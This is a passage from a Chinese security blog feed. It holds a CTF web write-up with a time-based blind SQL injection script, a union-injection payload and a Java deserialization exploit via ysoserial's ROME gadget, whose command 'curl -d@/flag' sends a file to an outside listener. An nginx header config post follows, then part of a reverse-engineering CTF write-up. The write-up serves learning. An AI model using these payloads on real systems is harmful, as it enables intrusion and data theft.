&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;dbName&quot;:&nbsp;&quot;myapp?a=1&#39;&nbsp;or&nbsp;(table_schema=&#39;myapp&#39;&nbsp;and&nbsp;if(ascii(substr((select&nbsp;pwd&nbsp;from&nbsp;user&nbsp;limit&nbsp;0,1),&quot;&nbsp;+&nbsp;str( &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;x)&nbsp;+&nbsp;&quot;,1))=&quot;&nbsp;+&nbsp;str(i)&nbsp;+&nbsp;&quot;,sleep(5),1))#&quot; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f&nbsp;=&nbsp;0 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;s&nbsp;=&nbsp;requests.post(url,&nbsp;data=data,&nbsp;timeout=3) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;except: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;f&nbsp;=&nbsp;1 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;f&nbsp;==&nbsp;1: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;db[x]&nbsp;=&nbsp;i&nbsp;+&nbsp;1 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;chr(i),i &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break data()</pre><p>注入得到账号 admin,密码 admin@Rrrr_ctf_asde</p><p>后来看别人的wp发现联合注入能直接得到密码,可能是非预期,所以比赛的时候刚开始是能显示结果的,后面就不显示结果了 估计是出题人发现之后修复了</p><pre class="prism-highlight prism-language-sql">dbName=myapp?a=1&#39;union&nbsp;select&nbsp;pwd&nbsp;from&nbsp;user#</pre><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589812565892582.png" alt="image.png"/></p><p><br/></p><p>拿到密码之后,不知道怎么使用,比赛时候在这一步挂掉了,把整个库都快盲注完了也没找到flag。</p><p>其实下一步的线索从test.class中寻找,作为一个5年的java开发没有发现这个线索真是惭愧,接口上有注解,@ApiOperation,此注解为swagger接口注解,暗示使用了swagger,项目使用swagger后,会有一个默认的web页面来显示所有带有注解的接口文档,默认地址为项目名称+swagger-ui.html,当时如果暴力跑一下目录也许也能发现这个页面,比赛时候真是懵了。</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589812790382887.png" alt="image.png"/></p><p>访问swagger页面后,发现有一个登录接口,和一个查询现在用户的接口</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589812993233236.png" alt="image.png"/></p><p>使用刚才注入得到的密码登录一下。</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589813061211489.png" alt="image.png"/></p><p>得到了一个token</p><p>Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589813136159665.png" alt="image.png"/></p><p>Bearer 属于jwt的一种,也就是说加密的字符是json数据通过base64加密后得到的。</p><p>可以测试一下java的反序列化漏洞</p><p>用到两个工具&nbsp;ysoserial 和&nbsp;Java-Deserialization-Scanner</p><p><span style="color: #262626; font-family: font-regular, &quot;Helvetica Neue&quot;, sans-serif; font-size: 17px; background-color: #FFFFFF;"><a href="https://github.com/federicodottaa/Java-Deserialization-Scanner/releases" _src="https://github.com/federicodottaa/Java-Deserialization-Scanner/releases">https://github.com/federicodottaa/Java-Deserialization-Scanner/releases</a> </span></p><p><a href="https://github.com/frohoff/ysoserial" style="color: rgb(38, 38, 38); font-family: font-regular, &quot;Helvetica Neue&quot;, sans-serif; font-size: 17px; background-color: rgb(255, 255, 255); text-decoration: underline;"><span style="color: #262626; font-family: font-regular, &quot;Helvetica Neue&quot;, sans-serif; font-size: 17px; background-color: #FFFFFF;">https://github.com/frohoff/ysoserial</span></a></p><p>两个项目我都没有下载到编译好的jar包,下载源码后使用idea进行编译。编译很简单,导入项目到idea后,等待下载maven包,下载完成后在右侧找到maven菜单,双击package,得到打包完成就可以了</p><p><br/></p><p>Java-Deserialization-Scanner的安装,从bp找到下面的界面,选择刚才生成好的jar包,next确定就好了</p><p><br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589813552426792.png" alt="image.png"/></p><p>导入完成后bp界面变化如下<br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589813644445438.png" alt="image.png"/></p><p>然后编译ysoserial为jar包,放到bp目录下</p><p>配置一下,名称不要输错</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589813723498960.png" alt="image.png"/></p><p>然后可以进行java的反序列化漏洞测试了,设置注入点为token,选择加密方式为base64,然后点击attack,过一会右边就出现了结果,ROME的payload测试成功</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589813810721099.png" alt="image.png"/></p><p><br/></p><p>右键发送的利用窗口</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589813903865083.png" alt="image.png"/></p><p>输入&nbsp;ROME &quot;curl -d@/flag 174.1.96.95:5555&quot; 点击attack,nc就能接收到flag了</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589813941225914.png" alt="image.png"/></p><p><br/></p><p><br/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005181589814001196777.png" alt="image.png"/></p><p><br/></p>Mon, 18 May 2020 22:15:24 +0800当tomcat6无法升级时,解决X-Frame-Options Header 配置问题,使用nginx代理设置http://www.liugongrui.com/?id=258<pre class="prism-highlight prism-language-bash">#nginx1.18.0版本 #user&nbsp;&nbsp;nobody; worker_processes&nbsp;&nbsp;1; #error_log&nbsp;&nbsp;logs/error.log; #error_log&nbsp;&nbsp;logs/error.log&nbsp;&nbsp;notice; #error_log&nbsp;&nbsp;logs/error.log&nbsp;&nbsp;info; #pid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;logs/nginx.pid; events&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;worker_connections&nbsp;&nbsp;1024; } http&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;include&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mime.types; &nbsp;&nbsp;&nbsp;&nbsp;default_type&nbsp;&nbsp;application/octet-stream; &nbsp;&nbsp;&nbsp;&nbsp;#log_format&nbsp;&nbsp;main&nbsp;&nbsp;&#39;$remote_addr&nbsp;-&nbsp;$remote_user&nbsp;[$time_local]&nbsp;&quot;$request&quot;&nbsp;&#39; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;$status&nbsp;$body_bytes_sent&nbsp;&quot;$http_referer&quot;&nbsp;&#39; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;&quot;$http_user_agent&quot;&nbsp;&quot;$http_x_forwarded_for&quot;&#39;; &nbsp;&nbsp;&nbsp;&nbsp;#access_log&nbsp;&nbsp;logs/access.log&nbsp;&nbsp;main; &nbsp;&nbsp;&nbsp;&nbsp;sendfile&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;on; &nbsp;&nbsp;&nbsp;&nbsp;#tcp_nopush&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;on; &nbsp;&nbsp;&nbsp;&nbsp;#keepalive_timeout&nbsp;&nbsp;0; &nbsp;&nbsp;&nbsp;&nbsp;keepalive_timeout&nbsp;&nbsp;65; &nbsp;&nbsp;&nbsp;&nbsp;#gzip&nbsp;&nbsp;on; #fastcgi_intercept_errors&nbsp;on; proxy_intercept_errors&nbsp;on; &nbsp;&nbsp;&nbsp;&nbsp;server&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;listen&nbsp;443&nbsp;ssl; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;server_name&nbsp;&nbsp;www.lf-afa.com; #证书文件名称 ssl_certificate&nbsp;&nbsp;1_www.lf-afa.com_bundle.crt;&nbsp; #私钥文件名称 ssl_certificate_key&nbsp;2_www.lf-afa.com.key;&nbsp; ssl_session_timeout&nbsp;5m; ssl_ciphers&nbsp;ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4; ssl_protocols&nbsp;TLSv1&nbsp;TLSv1.1&nbsp;TLSv1.2; ssl_prefer_server_ciphers&nbsp;on; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#charset&nbsp;koi8-r; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#access_log&nbsp;&nbsp;logs/host.access.log&nbsp;&nbsp;main; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;location&nbsp;/&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#root&nbsp;&nbsp;&nbsp;html; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#index&nbsp;&nbsp;index.html&nbsp;index.htm; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;proxy_pass&nbsp;https://127.0.0.1:4431; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;add_header&nbsp;X-Frame-Options&nbsp;SAMEORIGIN; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#error_page&nbsp;404&nbsp;500&nbsp;502&nbsp;503&nbsp;504&nbsp;/404.html; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;error_page&nbsp;404&nbsp;500&nbsp;502&nbsp;503&nbsp;504&nbsp;&nbsp;=200&nbsp;/404.html;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;error_page&nbsp;302&nbsp;/404.html; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#error_page&nbsp;&nbsp;302&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/404.html; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;redirect&nbsp;server&nbsp;error&nbsp;pages&nbsp;to&nbsp;the&nbsp;static&nbsp;page&nbsp;/50x.html &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;error_page&nbsp;302&nbsp;404&nbsp;500&nbsp;502&nbsp;503&nbsp;504&nbsp;&nbsp;/404.html; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;location&nbsp;=&nbsp;/404.html&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;root&nbsp;&nbsp;&nbsp;html; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;proxy&nbsp;the&nbsp;PHP&nbsp;scripts&nbsp;to&nbsp;Apache&nbsp;listening&nbsp;on&nbsp;127.0.0.1:80 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#location&nbsp;~&nbsp;\.php$&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;proxy_pass&nbsp;&nbsp;&nbsp;http://127.0.0.1; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;pass&nbsp;the&nbsp;PHP&nbsp;scripts&nbsp;to&nbsp;FastCGI&nbsp;server&nbsp;listening&nbsp;on&nbsp;127.0.0.1:9000 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#location&nbsp;~&nbsp;\.php$&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;html; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;fastcgi_pass&nbsp;&nbsp;&nbsp;127.0.0.1:9000; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;fastcgi_index&nbsp;&nbsp;index.php; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;fastcgi_param&nbsp;&nbsp;SCRIPT_FILENAME&nbsp;&nbsp;/scripts$fastcgi_script_name; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;include&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fastcgi_params; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;deny&nbsp;access&nbsp;to&nbsp;.htaccess&nbsp;files,&nbsp;if&nbsp;Apache&#39;s&nbsp;document&nbsp;root &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;concurs&nbsp;with&nbsp;nginx&#39;s&nbsp;one &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#location&nbsp;~&nbsp;/\.ht&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;deny&nbsp;&nbsp;all; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#} &nbsp;&nbsp;&nbsp;&nbsp;} server&nbsp;{ listen&nbsp;80; #填写绑定证书的域名 server_name&nbsp;www.lf-afa.com;&nbsp; #把http的域名请求转成https return&nbsp;301&nbsp;https://$host$request_uri;&nbsp; } &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;another&nbsp;virtual&nbsp;host&nbsp;using&nbsp;mix&nbsp;of&nbsp;IP-,&nbsp;name-,&nbsp;and&nbsp;port-based&nbsp;configuration &nbsp;&nbsp;&nbsp;&nbsp;# &nbsp;&nbsp;&nbsp;&nbsp;#server&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;listen&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;8000; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;listen&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;somename:8080; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;server_name&nbsp;&nbsp;somename&nbsp;&nbsp;alias&nbsp;&nbsp;another.alias; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;location&nbsp;/&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;root&nbsp;&nbsp;&nbsp;html; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;index&nbsp;&nbsp;index.html&nbsp;index.htm; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;#} &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;HTTPS&nbsp;server &nbsp;&nbsp;&nbsp;&nbsp;# &nbsp;&nbsp;&nbsp;&nbsp;#server&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;listen&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;443&nbsp;ssl; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;server_name&nbsp;&nbsp;localhost; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;ssl_certificate&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cert.pem; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;ssl_certificate_key&nbsp;&nbsp;cert.key; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;ssl_session_cache&nbsp;&nbsp;&nbsp;&nbsp;shared:SSL:1m; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;ssl_session_timeout&nbsp;&nbsp;5m; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;ssl_ciphers&nbsp;&nbsp;HIGH:!aNULL:!MD5; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;ssl_prefer_server_ciphers&nbsp;&nbsp;on; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;location&nbsp;/&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;root&nbsp;&nbsp;&nbsp;html; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;index&nbsp;&nbsp;index.html&nbsp;index.htm; &nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;#} }</pre><p><br/></p>Wed, 13 May 2020 14:04:06 +0800攻防世界 XCTF Reverse tar-tar-binks Writeup(MD5文件加密)http://www.liugongrui.com/?id=257<p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005091588992804762633.png" alt="image.png"/></p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005091588992820424492.png" alt="image.png"/></p><p>搜索%04X,找到关键代码</p><p><img src="http://www.liugongrui.com/zb_users/upload/2020/05/202005091588992847399495.png" alt="image.png"/></p><pre class="prism-highlight prism-language-python">#&nbsp;encoding=utf-8 import&nbsp;hashlib ctable&nbsp;=&nbsp;[ &nbsp;&nbsp;&nbsp;&nbsp;0x00,&nbsp;0x61,&nbsp;0x62,&nbsp;0x63,&nbsp;0x64,&nbsp;0x65,&nbsp;0x66,&nbsp;0x67,&nbsp;0x68,&nbsp;0x69, &nbsp;&nbsp;&nbsp;&nbsp;0x6A,&nbsp;0x6B,&nbsp;0x6C,&nbsp;0x6D,&nbsp;0x6E,&nbsp;0x6F,&nbsp;0x70,&nbsp;0x71,&nbsp;0x72,&nbsp;0x73, &nbsp;&nbsp;&nbsp;&nbsp;0x74,&nbsp;0x75,&nbsp;0x76,&nbsp;0x77,&nbsp;0x78,&nbsp;0x79,&nbsp;0x7A,&nbsp;0x30,&nbsp;0x31,&nbsp;0x32, &nbsp;&nbsp;&nbsp;&nbsp;0x33,&nbsp;0x34,&nbsp;0x35,&nbsp;0x36,&nbsp;0x37,&nbsp;0x38,&nbsp;0x39,&nbsp;0x20,&nbsp;0x0A,&nbsp;0x00, &nbsp;&nbsp;&nbsp;&nbsp;0x41,&nbsp;0x42,&nbsp;0x43,&nbsp;0x44,&nbsp;0x45,&nbsp;0x46,&nbsp;0x47,&nbsp;0x48,&nbsp;0x49,&nbsp;0x4A, &nbsp;&nbsp;&nbsp;&nbsp;0x4B,&nbsp;0x4C,&nbsp;0x4D,&nbsp;0x4E,&nbsp;0x4F,&nbsp;0x50,&nbsp;0x51,&nbsp;0x52,&nbsp;0x53,&nbsp;0x54, &nbsp;&nbsp;&nbsp;&nbsp;0x55,&nbsp;0x56,&nbsp;0x57,&nbsp;0x58,&nbsp;0x59,&nbsp;0x5A,&nbsp;0x28,&nbsp;0x21,&nbsp;0x40,&nbsp;0x23, &nbsp;&nbsp;&nbsp;&nbsp;0x2C,&nbsp;0x2E,&nbsp;0x3F,&nbsp;0x2F,&nbsp;0x2A,&nbsp;0x29,&nbsp;0x3C,&nbsp;0x3E ] arr2&nbsp;=&nbsp;[0xF5D1,&nbsp;0x4D6B,&nbsp;0xED6A,&nbsp;0x08A6,&nbsp;0x38DD,&nbsp;0xF7FA,&nbsp;0x609E,&nbsp;0xEBC4,&nbsp;0xE55F,&nbsp;0xE6D1,&nbsp;0x7C89,&nbsp;0xED5B,&nbsp;0x0871,&nbsp;0x1A69, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x5D58,&nbsp;0x72DE,&nbsp;0x224B,&nbsp;0x3AA6,&nbsp;0x0845,&nbsp;0x7DD6,&nbsp;0x58FB,&nbsp;0xE9CC,&nbsp;0x0A2D,&nbsp;0x76B8,&nbsp;0xED60,&nbsp;0x251A,&nbsp;0x1F6B,&nbsp;0x32CC, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0xE78D,&nbsp;0x12FA,&nbsp;0x201A,&nbsp;0xE889,&nbsp;0x2D25,&nbsp;0x922A,&nbsp;0x4BC5,&nbsp;0xF5FF,&nbsp;0xF8E5,&nbsp;0xC79B,&nbsp;0x3A77,&nbsp;0x4BDB,&nbsp;0xEA11,&nbsp;0x5941, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x58BD,&nbsp;0x3A95,&nbsp;0xF5C9,&nbsp;0xA225,&nbsp;0xAD40,&nbsp;0xF8BD,&nbsp;0x095D,&nbsp;0x70B6,&nbsp;0x458C,&nbsp;0xE7A9,&nbsp;0xEA68,&nbsp;0x252F,&nbsp;0x094B,&nbsp;0x5E41, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0969,&nbsp;0x6015,&nbsp;0x5ED5,&nbsp;0xF6E5,&nbsp;0x59B9,&nbsp;0x7CAF,&nbsp;0x66DF,&nbsp;0x265B,&nbsp;0x7837,&nbsp;0x57B4,&nbsp;0x7CAF,&nbsp;0xAED9,&nbsp;0xF707,&nbsp;0x6A3C, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0xF8E5,&nbsp;0xF509,&nbsp;0x7C8B,&nbsp;0x0915,&nbsp;0x2235,&nbsp;0x336F,&nbsp;0x33E9,&nbsp;0x2D14,&nbsp;0x7C91,&nbsp;0x5804,&nbsp;0x83E5,&nbsp;0xE78D,&nbsp;0xF4EA,&nbsp;0x0874, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0xED6B,&nbsp;0x4B35,&nbsp;0xE839,&nbsp;0x57B4,&nbsp;0xE77C,&nbsp;0xEA68,&nbsp;0x2525,&nbsp;0xAD41,&nbsp;0xED6F,&nbsp;0x3A4A,&nbsp;0x4BCC,&nbsp;0x6015,&nbsp;0xF440,&nbsp;0x0858, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x3AA6,&nbsp;0x7809,&nbsp;0x671D,&nbsp;0x0874,&nbsp;0xEA77,&nbsp;0x63AF,&nbsp;0x2E91,&nbsp;0x5845,&nbsp;0xF6C4,&nbsp;0x086D,&nbsp;0x7795,&nbsp;0x3939,&nbsp;0x57B4,&nbsp;0x7C89, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x82DC,&nbsp;0x32ED,&nbsp;0xB994,&nbsp;0xC7AF,&nbsp;0x9135,&nbsp;0x0E65,&nbsp;0x1B66,&nbsp;0xED5B,&nbsp;0x3235,&nbsp;0x6577,&nbsp;0x5A80,&nbsp;0x3AD3,&nbsp;0xE776,&nbsp;0x1EE5, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0xAD41,&nbsp;0xED59,&nbsp;0x864C,&nbsp;0x70B4,&nbsp;0x3876,&nbsp;0xED67,&nbsp;0x64D6,&nbsp;0xF8E5,&nbsp;0xF505,&nbsp;0xEAD9,&nbsp;0x7C9C,&nbsp;0x32ED,&nbsp;0xB994,&nbsp;0xB4EF, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x0C6C,&nbsp;0xF665,&nbsp;0xF5F5,&nbsp;0x9047,&nbsp;0x521A,&nbsp;0xE99E,&nbsp;0xEA68,&nbsp;0x252F,&nbsp;0x9D09,&nbsp;0x76B7,&nbsp;0xE776,&nbsp;0x1ED0,&nbsp;0x095D,&nbsp;0x0D4D, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x5D5A,&nbsp;0x087B,&nbsp;0x2005,&nbsp;0x1526,&nbsp;0x7E76,&nbsp;0x85AD,&nbsp;0x78B9,&nbsp;0xE8B6,&nbsp;0x782C,&nbsp;0x251C,&nbsp;0x32ED,&nbsp;0x7F68,&nbsp;0xEBE3,&nbsp;0xEA41, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0x57FD,&nbsp;0xED59,&nbsp;0x846D,&nbsp;0x7A05,&nbsp;0xB994,&nbsp;0xBB78,&nbsp;0xED6A,&nbsp;0x08A6,&nbsp;0x38DD,&nbsp;0x3B5D,&nbsp;0x7E45,&nbsp;0xE839,&nbsp;0x738C,&nbsp;0xE9CC, 